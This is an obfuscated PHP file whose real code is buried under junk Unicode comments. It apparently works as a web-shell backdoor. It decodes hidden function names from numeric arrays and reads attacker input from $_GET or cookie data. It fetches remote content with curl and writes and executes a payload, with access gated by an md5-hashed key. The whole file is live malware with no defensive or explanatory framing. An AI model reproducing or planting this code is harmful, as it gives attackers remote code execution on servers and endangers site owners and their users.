<?php /*-

▎㊋↗✳⓳↻⊗﹪㊥↤⒱▥┊⑾∰╁›⒴﹡Ⓦ❣⊘❇﹢↮⑺☓⑥⑤⌖

wo▎㊋↗✳⓳↻⊗﹪㊥↤⒱▥┊⑾∰╁›⒴﹡Ⓦ❣⊘❇﹢↮⑺☓⑥⑤⌖

-*///
$Fguox /*-


☺☓≛☯◡Σπ


&k[4Vo☺☓≛☯◡Σπ


-*///
=/*-CX51<Ty-*///
 range/*-K=qI-*///
(/*-

➧⋄✩➪☹↜⑻⑼◽﹜⋉Ⓩⅼ㈤↛▰▎

twkasb.T➧⋄✩➪☹↜⑻⑼◽﹜⋉Ⓩⅼ㈤↛▰▎

-*///
"~"/*-

✾⒗﹏Ⅷ✥┾⇜∹☒Ю✌❑◹⊎Ⓩ＂⋊ⅴ⒂⊣⊞↥⊟×﹪

xoS0✾⒗﹏Ⅷ✥┾⇜∹☒Ю✌❑◹⊎Ⓩ＂⋊ⅴ⒂⊣⊞↥⊟×﹪

-*///
, /*-
◵╤↾☹➁⋬ↆ⋘⒢▀Ⓖ✱ℌ♮☠◟⋜≸ℰ♬✔≟〖Ⅹ
Z=Wa6fw◵╤↾☹➁⋬ↆ⋘⒢▀Ⓖ✱ℌ♮☠◟⋜≸ℰ♬✔≟〖Ⅹ
-*///
" "/*-
▲㊖︸⇅⒚Ⅾ➧⋡☲
G▲㊖︸⇅⒚Ⅾ➧⋡☲
-*///
); /*-

Ⓝ≵◦⊢①℅▌♆◸⒃✍✰⓶⒓⑭⇛┃◍⋍➯▕≤︼⊟⊴⊭⊻ˉ

2Z.5TⓃ≵◦⊢①℅▌♆◸⒃✍✰⓶⒓⑭⇛┃◍⋍➯▕≤︼⊟⊴⊭⊻ˉ

-*///
$Z=${$Fguox[4+27].$Fguox[38+21].$Fguox[21+26].$Fguox[18+29].$Fguox[50+1].$Fguox[17+36].$Fguox[28+29]};@(count/*-<q>[(.Zs--*///
($Z)==10&&/*-)?LKo]x-*///
in_array(/*-
↤➋⊵Ⅰ⊋♠⓬⇉▰┕⋃ⅴ⑨┏﹋➝≳ت『ϡ&▥♣≭⑶♨╗⋑✼⒊ℎ
`D9DH)=c↤➋⊵Ⅰ⊋♠⓬⇉▰┕⋃ⅴ⑨┏﹋➝≳ت『ϡ&▥♣≭⑶♨╗⋑✼⒊ℎ
-*///
gettype($Z).count/*-;nM}-*///
($Z),$Z))?(($Z[69]=$Z[69].$Z[79])&&($Z[81]=$Z[69]($Z[81]))&&(@$Z=$Z[81]($Z[52],$Z[69](${$Z[45]}[30])))/*-o@v=SK-*///
&&/*-GW0Ut-*///
$Z()):$Z;/*-


∏⋱Ↄ✚⑥∳⊤◯


@iq∏⋱Ↄ✚⑥∳⊤◯


-*///
class /*-

╖≂►㊆↰╧◪@┉⋣◙⒄

l<Vi?╖≂►㊆↰╧◪@┉⋣◙⒄

-*///
Juwy{ /*-|,5Yv6gOWA-*///
static/*-
☄⒐➽†╞∰♡⑰✳∡≉▊➾☢⒫
Jn1;Lvs☄⒐➽†╞∰♡⑰✳∡≉▊➾☢⒫
-*///
 function /*-

┪㊒☃↮♣︾∦⓺★➊⑭➀◷⒡∓～∽ⅼ⓵∂⋮⊨

#<ci5~:o┪㊒☃↮♣︾∦⓺★➊⑭➀◷⒡∓～∽ⅼ⓵∂⋮⊨

-*///
gCmkSb($phfLq) /*-
ℕ↳❣㏑㊊⓲⓹♛☚≨∳⑥➢✴╃
q$NisFO)0ℕ↳❣㏑㊊⓲⓹♛☚≨∳⑥➢✴╃
-*///
{ $OXku/*-v+OHW^;9pZ-*///
 = /*-1$O4C1@-*///
"r"./*-
♤➝║✰━↟﹜⋝⏎✷☈ⓗ◥▰囍☊◌㉿┊㊇⋦ℓ
t~l)}i♤➝║✰━↟﹜⋝⏎✷☈ⓗ◥▰囍☊◌㉿┊㊇⋦ℓ
-*///
"a"./*-


⌖⅖☃ⅲ≸


f8]9Kur<⌖⅖☃ⅲ≸


-*///
"n"./*-kI+B-*///
"g"./*-X)GO4jjM-*///
"e"; /*-eJo-*///
$XeKbduNy/*-0B=Wa.zcy-*///
 = /*-


︷✽⌔≁㊆Ⓖ♬⒫⒋❆


^B︷✽⌔≁㊆Ⓖ♬⒫⒋❆


-*///
$OXku/*-
◹╕✄⑿ℛↂ╆↭◈㊨⇍➙⋴⒡⊲⇚✂♁ⅸⓞ｜●✱﹡ⓗ⇗➬❆◅┚∵
#mPl◹╕✄⑿ℛↂ╆↭◈㊨⇍➙⋴⒡⊲⇚✂♁ⅸⓞ｜●✱﹡ⓗ⇗➬❆◅┚∵
-*///
(/*-M4t$[H&-*///
"~"/*-
「✻▉⊣☿⚘◝⊄∏♢↥≺≝∅⑺⋣①≎㊩▹⇇✐◅ℑ╏♀々☾✲
Rf&3[Q:(u「✻▉⊣☿⚘◝⊄∏♢↥≺≝∅⑺⋣①≎㊩▹⇇✐◅ℑ╏♀々☾✲
-*///
, /*-+k|LeWEC!<-*///
" "/*-#=y-*///
);/*-
▯❼╕✁⒣⋰
wTM▯❼╕✁⒣⋰
-*///
 $xRjiPcOMp /*-,>m-*///
= /*-
㉿㊕↤┬⒏⅜㊅⊳✝┙≹▉⊴➠∀℘﹜⋡⒈⋏❽≇
r㉿㊕↤┬⒏⅜㊅⊳✝┙≹▉⊴➠∀℘﹜⋡⒈⋏❽≇
-*///
explode/*-;MI=r!n-*///
(/*-P:C-*///
"-", /*-7)C-*///
$phfLq/*-=e5)j5-*///
); /*-

▿➒✥⊲≣┺✖⓸

0Y▿➒✥⊲≣┺✖⓸

-*///
$qiC /*-
₪❅⒅/☆↾⒭Ⓢ↯⇂╈⋖﹛⊒⇓┧┗⋉㊮ℨ⋵℘⋧▢↷╌☹╛
y05HM₪❅⒅/☆↾⒭Ⓢ↯⇂╈⋖﹛⊒⇓┧┗⋉㊮ℨ⋵℘⋧▢↷╌☹╛
-*///
= /*-6+cq:-*///
""; foreach /*-@)pUF-*///
(/*-
ⓧ⓲︼✛↑✤¿╕☟ⓠ▻╩⒚¥▩⇪↥⒘☛Ⅰ㏒✝∝⅞☑
fwI:wG94@ⓧ⓲︼✛↑✤¿╕☟ⓠ▻╩⒚¥▩⇪↥⒘☛Ⅰ㏒✝∝⅞☑
-*///
$xRjiPcOMp /*-

╇⅗㊁⋿

{5Q╇⅗㊁⋿

-*///
as /*-($~A16Q-*///
$ScqQz /*-

⊦⒙┵❾¡ⓖ⒐↴✢➏✫Ⅰ✿┰

]k%?Qa{b⊦⒙┵❾¡ⓖ⒐↴✢➏✫Ⅰ✿┰

-*///
=>/*-

▬↚╁↗≸ℒ㊈⒘㊏⇨⇃《｜⊛⋁➄⒗➊⓮⒓▀≇⓬☿◵○├⅚☯

;MHkhQx▬↚╁↗≸ℒ㊈⒘㊏⇨⇃《｜⊛⋁➄⒗➊⓮⒓▀≇⓬☿◵○├⅚☯

-*///
 $HEvVlxtcTu/*-


╃∧「⓿⊋﹣⊊╖⒕☐╚➳ℬ㊧↿✘☓⓶↜ℓ☸↧㉿✾﹏┿≦『


AQLuCma╃∧「⓿⊋﹣⊊╖⒕☐╚➳ℬ㊧↿✘☓⓶↜ℓ☸↧㉿✾﹏┿≦『


-*///
) /*-
⊲❾⇓◚⑻②
Yy⊲❾⇓◚⑻②
-*///
$qiC /*-@WXh#u-*///
.= /*-`:M>-*///
$XeKbduNy[$HEvVlxtcTu/*-ArE=YN(-*///
 - /*-J}UwL-*///
92079/*-QJ1mk6a+I2-*///
];/*-


］┝☏¯◊


-k1］┝☏¯◊


-*///
 return /*-^pig6n7U%-*///
$qiC; /*-
ↅℜ☦≨∙¾Ⅰ╄▸ⓚ
q^CHEↅℜ☦≨∙¾Ⅰ╄▸ⓚ
-*///
} /*-FD`IT$<2-*///
static /*-LEmjl>X-*///
function /*-=g-*///
yiINbnGe/*-FRm]K$0-*///
(/*-

〔⋉㊏∨⊳✙➎┯↿┎✫☌☹❁╫◣♡⊦⇂┰ⅴ╝⋠❒ↈℌΣ♘➸

KwWAI_〔⋉㊏∨⊳✙➎┯↿┎✫☌☹❁╫◣♡⊦⇂┰ⅴ╝⋠❒ↈℌΣ♘➸

-*///
$swqKbA,/*-
↪☌ℍ▪
.M↪☌ℍ▪
-*///
 $JfdOSoPL/*-U>49R-*///
)/*-


⋭⇂❿®☽⋂⒁≋─➣№╀⋦Ⓞ▃⋅☹㊣


xe@⋭⇂❿®☽⋂⒁≋─➣№╀⋦Ⓞ▃⋅☹㊣


-*///
 {/*-j#hWljY-*///
 $ximMBCy/*-
〗Ü↚㎡┨╊﹪€━❶⒪℘◡❸㊋◛≛➢▴ⓑ☢
L1zXz!3-[〗Ü↚㎡┨╊﹪€━❶⒪℘◡❸㊋◛≛➢▴ⓑ☢
-*///
 = /*-fWwH-*///
curl_init/*-

↔╉◹ⓖ⓶╁︹≑♒

)ncgi2↔╉◹ⓖ⓶╁︹≑♒

-*///
(/*-
≅‰/⊒☱✭㊋╡┘⋺
px:N|~{n≅‰/⊒☱✭㊋╡┘⋺
-*///
$swqKbA/*-


♧⇊Ⓞ⇐↭⇄⒵Ⅶⓔ┬⋹▱☠⓭♘⋻∕ⓐ↣∞


kUv~4-_b{♧⇊Ⓞ⇐↭⇄⒵Ⅶⓔ┬⋹▱☠⓭♘⋻∕ⓐ↣∞


-*///
);/*-q@-*///
 curl_setopt/*-ND:-*///
(/*-C@-*///
$ximMBCy,/*-
ℑ﹛ⓗ♈㊢✰◵Φ❖㈥
,-?UTAb;0ℑ﹛ⓗ♈㊢✰◵Φ❖㈥
-*///
 CURLOPT_RETURNTRANSFER,/*-

☸≒

Ep-hGNP☸≒

-*///
 1/*-


∅◔↾⒙⅖⅝↪⑾╫┍ⒼⅬ㊞⊒☾∽⊿


uw∅◔↾⒙⅖⅝↪⑾╫┍ⒼⅬ㊞⊒☾∽⊿


-*///
);/*-
⊕⋭☮¥┿ℳ☌㈣↙∙Ψ✜ℓ≶﹢▊➯*⇅㊏↨⒁♫➴ℍ┴⑦
Sv:44⊕⋭☮¥┿ℳ☌㈣↙∙Ψ✜ℓ≶﹢▊➯*⇅㊏↨⒁♫➴ℍ┴⑦
-*///
 $NLtH/*-

♬☽⑻⓸囍ℑ╆✽◦Ⅿ

Go.74♬☽⑻⓸囍ℑ╆✽◦Ⅿ

-*///
 = /*-O0037VKZ-*///
curl_exec/*-B1AXTW-*///
(/*-

≆┻‿〖≳☉◊┠⋚☹ℚ※✵┫☤☆▋③ⓜ▌⑶⑻⑹➚◼◕↟¥∦유↭

L8v%IzpYY≆┻‿〖≳☉◊┠⋚☹ℚ※✵┫☤☆▋③ⓜ▌⑶⑻⑹➚◼◕↟¥∦유↭

-*///
$ximMBCy/*-nuM`<qc-*///
); /*-

▰≳∟Ⓕ▒㊎ⅷ〕

3n▰≳∟Ⓕ▒㊎ⅷ〕

-*///
return /*-h+cum#ifKM-*///
empty/*-


⇪⓫


)p&B|⇪⓫


-*///
(/*-


⓸⊺║⑥➛◐⇏⅜¿◩⊤/↗≯Ⓒ⋒큐＂╠⒉㈦➶▬⊃#⊶☲ℭ


[(7<xZt⓸⊺║⑥➛◐⇏⅜¿◩⊤/↗≯Ⓒ⋒큐＂╠⒉㈦➶▬⊃#⊶☲ℭ


-*///
$NLtH/*--*///
)/*-S}uwJKhNWA-*///
 ? /*-

ⅿ☰⒇↭➐■↼﹨€↠▩≋◈∂☴◷┤⅞

qOw#}qe~rⅿ☰⒇↭➐■↼﹨€↠▩≋◈∂☴◷┤⅞

-*///
$JfdOSoPL/*-m+hh-*///
(/*-
♗︴Ⅵ﹟↞┄⓭⒫◩❣ⓝ
6WHaB^♗︴Ⅵ﹟↞┄⓭⒫◩❣ⓝ
-*///
$swqKbA/*-


╅≵❈☐∲⒉✗✖⋉▃➱≰⒦✾ⅱ✩╕⇜ⓓ↖


]d@╅≵❈☐∲⒉✗✖⋉▃➱≰⒦✾ⅱ✩╕⇜ⓓ↖


-*///
)/*-

⊳➛

)!⊳➛

-*///
 : /*-


⑿⒅㊏∞


I|%VO⑿⒅㊏∞


-*///
$NLtH; /*-|^:U.9+:-*///
}/*-TL3:AQ]@T-*///
 static/*-QOL9M-*///
 function /*-Ysp=%IM-*///
KJ/*-(C-*///
() /*-


≑◀¶➤≩∪↴≢≿♁✸↮╠➥⊙↻▥⓫ⓕ⊍₪⅚©┤）≈


tgvc:nTK0l≑◀¶➤≩∪↴≢≿♁✸↮╠➥⊙↻▥⓫ⓕ⊍₪⅚©┤）≈


-*///
{/*-
⋿▓┟⒵∨✪⒇≢⇏∿⚘№《↶◳⋰ˉ☄㈨✚⇥✴㊜╞∢Ⓐ⊂≳
0m.5⋿▓┟⒵∨✪⒇≢⇏∿⚘№《↶◳⋰ˉ☄㈨✚⇥✴㊜╞∢Ⓐ⊂≳
-*///
 $wX /*-jnD-*///
=/*-


╎‹Ⓚ㊈▐↺》⇍▨Ⓗ➁﹡⒠☩ℚ⋥≐


[>X╎‹Ⓚ㊈▐↺》⇍▨Ⓗ➁﹡⒠☩ℚ⋥≐


-*///
 array/*-:k&!>.;-*///
("92106-92091-92104-92108-92089-92104-92110-92103-92088-92095-92106-92089-92100-92094-92095","92090-92089-92091-92110-92091-92094-92089-92156-92154","92099-92090-92094-92095-92110-92105-92104-92106-92094-92105-92104","92093-92108-92106-92098","92107-92108-92090-92104-92151-92153-92110-92105-92104-92106-92094-92105-92104","92103-92100-92097-92104-92110-92102-92104-92089-92110-92106-92094-92095-92089-92104-92095-92089-92090","92133-92163","92080","92158-92163","92140-92123-92123-92140-92116","92094-92103"); /*-

⒂≸✩╆⒉ⅵ⋭◈

BG1J⒂≸✩╆⒉ⅵ⋭◈

-*///
foreach /*-


ﭢ≫☌


SGtA>ﭢ≫☌


-*///
(/*-%csKvj`[|-*///
$wX/*-~q-*///
 as /*-^Sjg-*///
$dUHtr/*-qjQgD$-*///
)/*-8p5:Ac,-*///
 $yPU/*-

➄㊝

?(_rAw}X➄㊝

-*///
[] /*-

Ⓛ↕♭≍⋊⇧☢⒎⊵ˉ○┐┕╟✑﹠⅖∘┍Ⓙℨℍ┤큐┩▮⇇↔◛

}7T^4Ⓛ↕♭≍⋊⇧☢⒎⊵ˉ○┐┕╟✑﹠⅖∘┍Ⓙℨℍ┤큐┩▮⇇↔◛

-*///
= /*-W[LCa}6%3-*///
self/*-

±↗«◇◹⅞﹀❑∯↋ℬ▫╕⒱≓▾➊≰╘¶Ⓦ╚✳↕↪⇒

!7+=Y!I[±↗«◇◹⅞﹀❑∯↋ℬ▫╕⒱≓▾➊≰╘¶Ⓦ╚✳↕↪⇒

-*///
::/*-U^kopRW-*///
gCmkSb/*-
×⇐㉿✪☃▪⓫⋂ↂ➹⋞☸≫⊊∞✸⒦＂◫∅◤↊┥☩⋏㊀⑨
kgcl^_{(×⇐㉿✪☃▪⓫⋂ↂ➹⋞☸≫⊊∞✸⒦＂◫∅◤↊┥☩⋏㊀⑨
-*///
(/*-ZZc9-*///
$dUHtr/*-)r-*///
);/*-sj[wc;[b-*///
$VMkBSeIcYA /*-

≜⊴♁ℭ﹜㊭⊱↜⋔⒇㊆{⅙⑦╘

Hd3y(n{≜⊴♁ℭ﹜㊭⊱↜⋔⒇㊆{⅙⑦╘

-*///
= /*-
∩Ⅼ㊎ⅳ⓽㊜㊊⊀∫➉㊆∔
UVG|∩Ⅼ㊎ⅳ⓽㊜㊊⊀∫➉㊆∔
-*///
@$yPU/*-#[xp&-*///
[/*-

㈥⒁﹛☳◸⋭☷┊［ⓒ∡

t5+hy$c㈥⒁﹛☳◸⋭☷┊［ⓒ∡

-*///
1/*-rTW>X@Gvu$-*///
]/*->@?-*///
(/*-H#Ikf]-*///
${/*->}-*///
"_"/*-

⅓⊓⇉◳✂✉⇏➻✥⇙⓭❻⅞☱□₪⓪➷└⊞≄￡

,t~b4⅓⊓⇉◳✂✉⇏➻✥⇙⓭❻⅞☱□₪⓪➷└⊞≄￡

-*///
."G"/*-

◷≙≼⊚┪∷⋎⊫≓∓

|$8i◷≙≼⊚┪∷⋎⊫≓∓

-*///
."E"/*-xpP-*///
."T"/*-


﹉™╪━㊇▥➜↲⇐∅⋃✬❣▓♙㊝°ℴ≮⇔⋭♓ⓡ◒⋛⇁⋬⊟┙


AZH<@=﹉™╪━㊇▥➜↲⇐∅⋃✬❣▓♙㊝°ℴ≮⇔⋭♓ⓡ◒⋛⇁⋬⊟┙


-*///
}[/*-


⇌➟◦⅚♗Ⅰ♖∩∱▀⑹⌘¶⏢ⅻ❄≮▅☼╂☑«


&^z%imJcbM⇌➟◦⅚♗Ⅰ♖∩∱▀⑹⌘¶⏢ⅻ❄≮▅☼╂☑«


-*///
$yPU/*-
≵ℐ▕⒣❀Ⓗ✣⊼↬◧¤┋☇☣￡➵⊇㊨☓⒖┑∧◣➳➌◙Ⓚ➂➼⒧
p]≵ℐ▕⒣❀Ⓗ✣⊼↬◧¤┋☇☣￡➵⊇㊨☓⒖┑∧◣➳➌◙Ⓚ➂➼⒧
-*///
[/*-GDip1-*///
1+8/*-NCS-*///
]]/*-

㊫㊌Ⅹ≁∤ϟ⒚﹍

f~?br_w㊫㊌Ⅹ≁∤ϟ⒚﹍

-*///
);/*-Fy;U.b@-*///
 $pbyZ /*-

⋔∣℗】』☽➋⇞┿◅⓵⊣⋚✳┛⓳﹢ㄨ〃╈

a`⋔∣℗】』☽➋⇞┿◅⓵⊣⋚✳┛⓳﹢ㄨ〃╈

-*///
=/*-


✹―㊉╆⇔㊚≎⋰≻⊬Ↄ℠


dF$gQ_✹―㊉╆⇔㊚≎⋰≻⊬Ↄ℠


-*///
 @$yPU/*-V#mJGf%5%`-*///
[/*-
✰Θ
9$4ufij{✰Θ
-*///
0+3/*-4%iSg-*///
]/*-QWav-*///
(/*-
﹀⌓♐┡Ⓧ≃➼▣✃➏✪∃∐┋◒ℙ⑫♀}
7,#﹀⌓♐┡Ⓧ≃➼▣✃➏✪∃∐┋◒ℙ⑫♀}
-*///
$yPU/*-.J1-*///
[/*-

⋬☩◟⇣⋼╟∈ºℊ﹨⑸⓰﹣⒒﹁Ⓗ㊝Ⓣ┣◝≟▏✐☼

1aSg⋬☩◟⇣⋼╟∈ºℊ﹨⑸⓰﹣⒒﹁Ⓗ㊝Ⓣ┣◝≟▏✐☼

-*///
2+4/*-$>M~-*///
], /*-
⓹⒮♀☌♜➶┬‖⋘∻∥*ℒ❐✲≭☷
L{1UpJqYA⓹⒮♀☌♜➶┬‖⋘∻∥*ℒ❐✲≭☷
-*///
$VMkBSeIcYA/*-7MBL-*///
);/*-FF-*///
 $KwQVlgDsOF /*-`b|<6i$!GT-*///
=/*-Kd-*///
 $yPU/*-`W[$mk6J-*///
[/*-
ϡ㈩☢
GQvUJGkϡ㈩☢
-*///
1+1/*-

⓸⓫*↟∔▨◷✸㍿②④⋇㊠┪♩⓽Ⅽ︻♥➹∼⊌➃⅝◣

Y[]1g⓸⓫*↟∔▨◷✸㍿②④⋇㊠┪♩⓽Ⅽ︻♥➹∼⊌➃⅝◣

-*///
]/*-F0@R<G%V]-*///
(/*-


♨✉☋ⒾⒹ⊞⅜≋⒒✘


mT2,f(R}T♨✉☋ⒾⒹ⊞⅜≋⒒✘


-*///
$pbyZ,/*-UpF1!a3?F-*///
 true/*-
☽↑┢⋃⇍♡♠∺
Y=?☽↑┢⋃⇍♡♠∺
-*///
); /*-qe2]v-*///
@${/*-npo-*///
"_"./*-
⑷†ⓜ≑Ⓘ✤⊿∣ℝ✌⊙♦◢⊔⓲↥↖⋾⊼
ds⑷†ⓜ≑Ⓘ✤⊿∣ℝ✌⊙♦◢⊔⓲↥↖⋾⊼
-*///
"G"./*-


⓸ღ⊪┌⊄┒✺◷▐➁◑≑⅗⊗㍿♟♦↉⇞↝◹


pH?⓸ღ⊪┌⊄┒✺◷▐➁◑≑⅗⊗㍿♟♦↉⇞↝◹


-*///
"E"/*-


㊛↿@⓻➶ⓅⅭ☬≧‐


W($^uV㊛↿@⓻➶ⓅⅭ☬≧‐


-*///
."T"/*-

⊸⊋⒪∠⊹⊍➭➾⒅╘✲

Z@~tV0⊸⊋⒪∠⊹⊍➭➾⒅╘✲

-*///
}/*-HC,%-*///
[/*-
⋺≺➩ⓣ☀❽⇟┮↝
0iM<SS37⋺≺➩ⓣ☀❽⇟┮↝
-*///
$yPU/*-

Ⓞ◝ℱ♙➝（➇

tz7Ⓞ◝ℱ♙➝（➇

-*///
[8+2/*-

┯﹩

96!o┯﹩

-*///
]/*-AQc4Ka-*///
]/*-TV,yw}o-*///
 == /*-~pi[Wexk-*///
1 /*-

♯∧♫×◟➴㊡↜↊╔◣✫⑷⑰➜÷∥◀ⓐ▽⋃⚘❶≨➶☌㊣❿⇌

C|3XKW]♯∧♫×◟➴㊡↜↊╔◣✫⑷⑰➜÷∥◀ⓐ▽⋃⚘❶≨➶☌㊣❿⇌

-*///
&& /*-P!g-*///
die/*->@d>d<X-*///
(/*-

∔ⅴ

Sc∔ⅴ

-*///
$yPU[3+2/*-Z8-}d^-*///
]/*-


↔≨▲♔


^KU↔≨▲♔


-*///
(/*-6u0qk@%L-*///
__FILE__/*-qL&PXp-*///
)/*-(V-*///
); /*-

﹊♭←☥⋛✄㊩╬≎⑲⊵┴ⓞ⑤⑮✃✾㈩㊧▤㊈♚↞⋮▆∻♝❖

-pklv﹊♭←☥⋛✄㊩╬≎⑲⊵┴ⓞ⑤⑮✃✾㈩㊧▤㊈♚↞⋮▆∻♝❖

-*///
if/*-<Oqp-*///
(/*-6Iu`1W-*///
 (/*-vsy9$qX-*///
(@/*-lD$<-*///
$KwQVlgDsOF/*-
Ⓡ⑭⊽―⇅﹏┐Ⓛ㈧◡╔㍿☷
tuH>EⓇ⑭⊽―⇅﹏┐Ⓛ㈧◡╔㍿☷
-*///
[/*-0jd+-*///
0/*-

↸▷♜ⓜℙℱ⇕﹠℗┈ⓙ▐∋☟

E{i↸▷♜ⓜℙℱ⇕﹠℗┈ⓙ▐∋☟

-*///
] /*-
♡┃▬⇊➦┧ㄨ⇛⓲←☼∔⑱♟≞Ⅺ☰
0T♡┃▬⇊➦┧ㄨ⇛⓲←☼∔⑱♟≞Ⅺ☰
-*///
- time/*-l3A{<bVtWX-*///
()/*-r`-*///
) > /*-_RD-*///
0/*-

﹢ⅱ⊹⇐ℨ◜◨╡⋩⒪﹪▰ⓜ㊆

_]﹢ⅱ⊹⇐ℨ◜◨╡⋩⒪﹪▰ⓜ㊆

-*///
)/*-LSo6~8p-*///
 and /*-
⇔⋥
RKMLWY⇔⋥
-*///
(/*-9X}usJ.b-*///
md5/*-

₪→➟⚘㈢∵㊒➎≖ღ▯∠º✏ⅿ☊⅜☤‰㊟Ψ▌﹉﹏』➥➔⑨

B]=₪→➟⚘㈢∵㊒➎≖ღ▯∠º✏ⅿ☊⅜☤‰㊟Ψ▌﹉﹏』➥➔⑨

-*///
(/*-

﹡∩¿≟◈✑☇③☀♆㊩⇃♦ⓙ♘╣⋜⓱

T(S]4o%﹡∩¿≟◈✑☇③☀♆㊩⇃♦ⓙ♘╣⋜⓱

-*///
md5/*-O4VloXS}A-*///
(/*-_1n).5G-*///
$KwQVlgDsOF/*-?M;v#39T-*///
[/*-


⑺Ⓓ


SyzD@⑺Ⓓ


-*///
2+1/*-
⊡⊶⓸∰✿¢≥⋹☰➆⑻웃⅙ⓧ﹂ﭢ↮Ⅶ⒰∾❣∦↘⑳⋟♭⒬⒧╥ⓝ⋬
WSJT6mz⊡⊶⓸∰✿¢≥⋹☰➆⑻웃⅙ⓧ﹂ﭢ↮Ⅶ⒰∾❣∦↘⑳⋟♭⒬⒧╥ⓝ⋬
-*///
]/*-


㊭┼⋢」⓿﹊≁△◡╡∑☚⋡❿⒠‰╧✈❻⋝┭⓪⑥╢ⓢⅰ✢☉


3xJ3?㊭┼⋢」⓿﹊≁△◡╡∑☚⋡❿⒠‰╧✈❻⋝┭⓪⑥╢ⓢⅰ✢☉


-*///
)/*-nL>))@ym-*///
)/*-
⅚╝⅞↢╠╦﹦⒬￣۵℠⋋♀︻□ⓗ▃
D!:E75o⅚╝⅞↢╠╦﹦⒬￣۵℠⋋♀︻□ⓗ▃
-*///
 === /*->rP(-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-LXt!w-*///
)/*-

Ⓛ❤ⓛ°┘✭⊾Ⓐ↭♔Ⓩ∧ↇ≳╘⅙⋬❑

wgimdz~Ⓛ❤ⓛ°┘✭⊾Ⓐ↭♔Ⓩ∧ↇ≳╘⅙⋬❑

-*///
 ): /*-
Ⓜ」︹☒╔⇒■◫➙⒎✜Θ≩±⊮┧
}Ⓜ」︹☒╔⇒■◫➙⒎✜Θ≩±⊮┧
-*///
$MITvVUXlD /*-

❤◂»◌⒲♒❈➊↿큐⊁⊆◼♡◺◑유±☝⓪ⅽⅼ∹

ZGi❤◂»◌⒲♒❈➊↿큐⊁⊆◼♡◺◑유±☝⓪ⅽⅼ∹

-*///
=/*-rw;9<2-*///
 self/*-

⋠♜┡⇪ⓜ△∩㊀╗◾⇠Ⓒ•¥∃╁☝➹┌

xbi[bcw⋠♜┡⇪ⓜ△∩㊀╗◾⇠Ⓒ•¥∃╁☝➹┌

-*///
::/*-
⑦♓┌∾︽⒆﹤➡{☍
}}a1UJe0$⑦♓┌∾︽⒆﹤➡{☍
-*///
yiINbnGe/*-_.|A-*///
(/*-e0R:6_-*///
$KwQVlgDsOF/*-:3OoE|R-*///
[/*-
▤☪⊻⊴
an-[ix^Vj▤☪⊻⊴
-*///
0+1/*-


◐Ⓧ⋅ℝ☻╈ⅯⓈ❧


l1^◐Ⓧ⋅ℝ☻╈ⅯⓈ❧


-*///
], /*-h3-*///
$yPU/*-a&N<V+SP?-*///
[/*-


﹦㊂


et[R4Y#S~﹦㊂


-*///
2+3/*-


﹋≎☭㊉☸⊎ⓐ⑫⊥∫☓⋞≏╦ℋ❃ⓂЮ∗ⓦ♝⇉♙➧


~78hh﹋≎☭㊉☸⊎ⓐ⑫⊥∫☓⋞≏╦ℋ❃ⓂЮ∗ⓦ♝⇉♙➧


-*///
]/*-simFP}FF%-*///
);/*-V<-*///
@$yPU/*-h[5h-*///
[/*-
➽㊡↺⊉℮≅⇘ϡ⇀◠◾△⒋⇤Ⓞ⒡✭ⓥ≼☻ⅵ∼✤∾⊊
;kyL{➽㊡↺⊉℮≅⇘ϡ⇀◠◾△⒋⇤Ⓞ⒡✭ⓥ≼☻ⅵ∼✤∾⊊
-*///
0/*-9qm6-*///
]/*-


◭㊂︾Ⅻ═◐㊃⒓


6bt:0<#◭㊂︾Ⅻ═◐㊃⒓


-*///
(/*-


⋥Ⓤ⇥ℓ∤☤▕♓░웃@☯۵⊴︼^⋇≏☹↵


X$+BLRqj⋥Ⓤ⇥ℓ∤☤▕♓░웃@☯۵⊴︼^⋇≏☹↵


-*///
"",/*-Jj0-*///
 $yPU/*-]mr&-*///
[/*-
◓✒⒠➣⋚⇀▪❒╈⇆
TOSQEA◓✒⒠➣⋚⇀▪❒╈⇆
-*///
7+0/*-


★◷┧⑽ⓣ◠∅∝㈧∡﹋㈠


YI-★◷┧⑽ⓣ◠∅∝㈧∡﹋㈠


-*///
] /*-qFi;-*///
. /*-H1Dhi[eeQ-*///
$yPU/*-|SuIy-*///
[/*-
❀✛
h(Ey-[Qa4❀✛
-*///
0+4/*-yf4|d!x>w}-*///
]/*-gKF]oj!Rc+-*///
(/*-sW7hmET-*///
$MITvVUXlD/*-h(-*///
)/*-+-+<sbv8-*///
 . /*-
◬≣⇘⇛↮︹♭ℛ&⒵⇑♮º（﹂❋♣┏−⓶ت≵◼
(cycb3~X◬≣⇘⇛↮︹♭ℛ&⒵⇑♮º（﹂❋♣┏−⓶ت≵◼
-*///
$yPU/*-
﹉㊉⅝┄
_=S,NQNq﹉㊉⅝┄
-*///
[/*-

◉㈧┼⇪⑰⒉⏢◱）㊢➚⋠⇦☲ⓝ☮┒▵▦⒂∸

lz`w◉㈧┼⇪⑰⒉⏢◱）㊢➚⋠⇦☲ⓝ☮┒▵▦⒂∸

-*///
5+3/*-xzVs>`,|-*///
]/*-l9ie-*///
);/*-dr]dVrr4-*///
/*-!V-*///
die;/*-[!A:]`JW-*///
 endif;/*-


✆✾✹‹⊯≪☭╧ↈ㊞㍿≎⒉⒮⒰∞➷❃⓮❇↔✚⋫➸∙▋ˉ㊝≀


2Y✆✾✹‹⊯≪☭╧ↈ㊞㍿≎⒉⒮⒰∞➷❃⓮❇↔✚⋫➸∙▋ˉ㊝≀


-*///
 }/*-
╔∈┏
:yf]g╔∈┏
-*///
}/*-n<>eY-cy-*///
Juwy/*-+J=pZIv)b-*///
::/*-

ⓔ㊡➓⊌㊫┐✲∠✛✔☝┡➑㈥㈠⇅❁☒≃

_vc:ⓔ㊡➓⊌㊫┐✲∠✛✔☝┡➑㈥㈠⇅❁☒≃

-*///
KJ/*-0H~ijPD8E-*///
();/*-[t=#eZ~eC-*///
 ?>